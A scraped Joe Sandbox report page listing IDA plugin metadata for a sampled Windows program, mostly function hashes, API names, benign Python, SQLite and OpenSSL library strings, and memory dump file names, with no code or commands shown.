Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
• Instruction ID: 43c8f9c447001a8a1015abfabceffc146aa3ecb77f293aab244723419772810e
• Opcode Fuzzy Hash: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
• Instruction Fuzzy Hash: D3C1C123A0C6A792E6619F1D94402BD3BA0FB81F91F554235EB8E83BB1CE7CE8458700

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
• API String ID: 2050909247-2434346643
• Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
• Instruction ID: 81718045b4f0cc2df8531e2afdf1908686f62bc0f3d0074c7a022fbbb2a69b9f
• Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
• Instruction Fuzzy Hash: 10417F23A1CA8791EB25DB28E4542E96321FF44398F800132EB5D876F6EF3CE609C740

Control-flow Graph

Control-flow graph (legend: Executed / Not Executed): function at 7ffe0130ffd0, basic blocks 7ffe0130ffd0-7ffe0131065a, calling CreateFileW
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
• Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
Similarity
• API ID: CreateFile
• String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
• API String ID: 823142352-3829269058
• Opcode ID: 9fa68a4d019e543b82f48475598e9f337480dd6f5aee3ec3198131acb147343e
• Instruction ID: b39c23d2f04684aeedbbcf3b8216fa34675faa9dcf65057b55973653eaaa5bc7
• Opcode Fuzzy Hash: 9fa68a4d019e543b82f48475598e9f337480dd6f5aee3ec3198131acb147343e
• Instruction Fuzzy Hash: 13027A21A0DA83C6FB688F65A85467973B0FF84B98F054235EE4E4A6B5DF3CE485C701
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
• Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
Similarity
• API ID: 00007A463010$FileRead
• String ID: delayed %dms for lock/sharing conflict at line %d$winRead
• API String ID: 2600561947-1843600136
• Opcode ID: 66d7818fc9c6dce62004362554e4c0cfd5c82727d3bea9d87ae7196a0384542c
• Instruction ID: 246d659aaaac3c0270fc440e5f12285b073fb8f787a0c5e011c6732e1d2d8a08
• Opcode Fuzzy Hash: 66d7818fc9c6dce62004362554e4c0cfd5c82727d3bea9d87ae7196a0384542c
• Instruction Fuzzy Hash: 30412222A0CA8782E7218FD5E8405B9B7E5FF94784F42403AEA4D4B6B4DF3CE4868740
APIs
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279662727-0
                                                                                                                                                                                                                                              • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                              • Instruction ID: 0bb9fd529e0937b88cd4e6ffa7f4e000f86cc17932332b5b5c4e2bc2f5ff710c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27418023E1C79283E7509F6495503696260FB947A5F109335EBAC83EE2EF7CA5E08740
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                                              • String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_read_n
                                                                                                                                                                                                                                              • API String ID: 1452528299-4226281315
                                                                                                                                                                                                                                              • Opcode ID: 72c0e7aa6cb440006a06cd762c0773f9cb24828254b5c2bc54d82e6e819b576e
                                                                                                                                                                                                                                              • Instruction ID: 19c92ac0c6445d6dad898d4b82b12de7dd03a55d7250fce7a73e5009a107a884
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72c0e7aa6cb440006a06cd762c0773f9cb24828254b5c2bc54d82e6e819b576e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9A17B61B0EA8681FB58BB25D8147B92294AF85B94F5C4132EF4D0BBADDF3CD845C310
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                                              • String ID: ..\s\ssl\statem\statem.c$state_machine
                                                                                                                                                                                                                                              • API String ID: 1452528299-1722249466
                                                                                                                                                                                                                                              • Opcode ID: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
                                                                                                                                                                                                                                              • Instruction ID: f76e6f8e5446e7c8126656ef66b40b4505566e243c94897083714a2b70a0fa8f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46A12D26A0E64385FB64BA25D8413BD22A5EF41F44F5C4436DB4D467FECE3CE8828752
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                                              • String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_write_pending
                                                                                                                                                                                                                                              • API String ID: 1452528299-1219543453
                                                                                                                                                                                                                                              • Opcode ID: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
                                                                                                                                                                                                                                              • Instruction ID: 6693d6dd0a551a673d6da3c826f9b48a180c43ab5792340b9dad0ff8b7368ceb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F41A0B2B0AA4182F7A0AB15D5447B973A0FB85B84F1C8136EB4D07BADDF3DE4518341
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3251591375-0
• Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
• Instruction ID: c5f8044358c9d798c5894b463f45aa4f97b247633c3543ef5eb62a9e4030bf9b
• Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
• Instruction Fuzzy Hash: 77313A23E0C29745FA54AB6C94623F91791AF82388F44503AEB4ECB6F7DE2DB8059241

APIs
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
• Instruction ID: 9e601518f5a6b0b002dad5668a8733424aa08585c56ca06e0a9f930c2eb9cb6b
• Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
• Instruction Fuzzy Hash: 6F510723B0D26586FB289F2D980167A6291BF44BA5F194735DF7D83BE5DF3CE4018620

APIs
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
• Instruction ID: 9348fd7082fa0307d0cc518e5fe57c94b1d6325e0784e436dff23ff2b4a4699b
• Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
• Instruction Fuzzy Hash: 8211C463A0CAA181DA208B2AE8141696361AB45FF4F544335EF7D8BBF9DE7CE0518740

APIs
• CloseHandle.KERNEL32(?,?,?,00007FF6B751A9D5,?,?,00000000,00007FF6B751AA8A), ref: 00007FF6B751ABC6
• GetLastError.KERNEL32(?,?,?,00007FF6B751A9D5,?,?,00000000,00007FF6B751AA8A), ref: 00007FF6B751ABD0
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• API String ID: 918212764-0
• Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
• Instruction ID: 407f86b3c7839f6f1954c1288e880ec10a226cb763a7050fad2a332fc2f14047
• Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
• Instruction Fuzzy Hash: 7421AB13F1C6E241FA669BA9949037D12929F847A5F044239DB1EC7FF5DE6CF8814300

APIs
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
• Instruction ID: 6c5d8e89f1f6e1cb93ead1f22dc2cae22c4fa37c2040123e0360d7510bde1ba4
• Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
• Instruction Fuzzy Hash: 9C419A3391C25587EA259F2DA54027973A1EB5AB92F100235EBCEC3AE1CF6CE4438B51

APIs
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: _fread_nolock
• String ID:
• API String ID: 840049012-0
• Opcode ID: 479405c7ef634ee4bdd4ed85459738d9743f05c8c4b8da07aaad499d404441fa
• Instruction ID: 37860710e2ad52b969d1663f6b44e6b6ee08945183f3051cc32d536a3ba7d339
• Opcode Fuzzy Hash: 479405c7ef634ee4bdd4ed85459738d9743f05c8c4b8da07aaad499d404441fa
• Instruction Fuzzy Hash: 2421D622B1C66146FA109B2A6914BFA9781BF45BD8F884430EF4C97B96CE7DF042C300

APIs
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
• Instruction ID: 1e28fe687b4b102906b4916518218b98f1f38c22012c395fdba5b578c0066d66
• Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
• Instruction Fuzzy Hash: BF316123A1C62285F7116F5D884137C26A0AF80FA6F415235EB5D97BF2CE7CF4428711
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                              • Instruction ID: 1ed75aa72f50d236d9686b0a6e597cd7aba8c1c411a2243c41135f4c077dd308
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5116023E1C66282EA61AF19940027EA264BF85B85F444536FB8CD7FB6DF3DE4418700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                              • Instruction ID: be48282a8cd2cc7da7c5f69b13c750ed32804945e68f4a7ac804d1c504c0b065
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3218433A1CA4586EB618F1CD48037976A0FB94B54F244234EB9EC7AE9DF3CD4118B00
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                                                                                                                              • Opcode ID: 8603938ac5e1fbf28ba7d9b8f40a04eb8b77d7e104ff7c3c46d49aacb8bdd123
                                                                                                                                                                                                                                              • Instruction ID: 6ef378361b40011260eda6503fe923329641f169ad23eeca6a372cdf930790fb
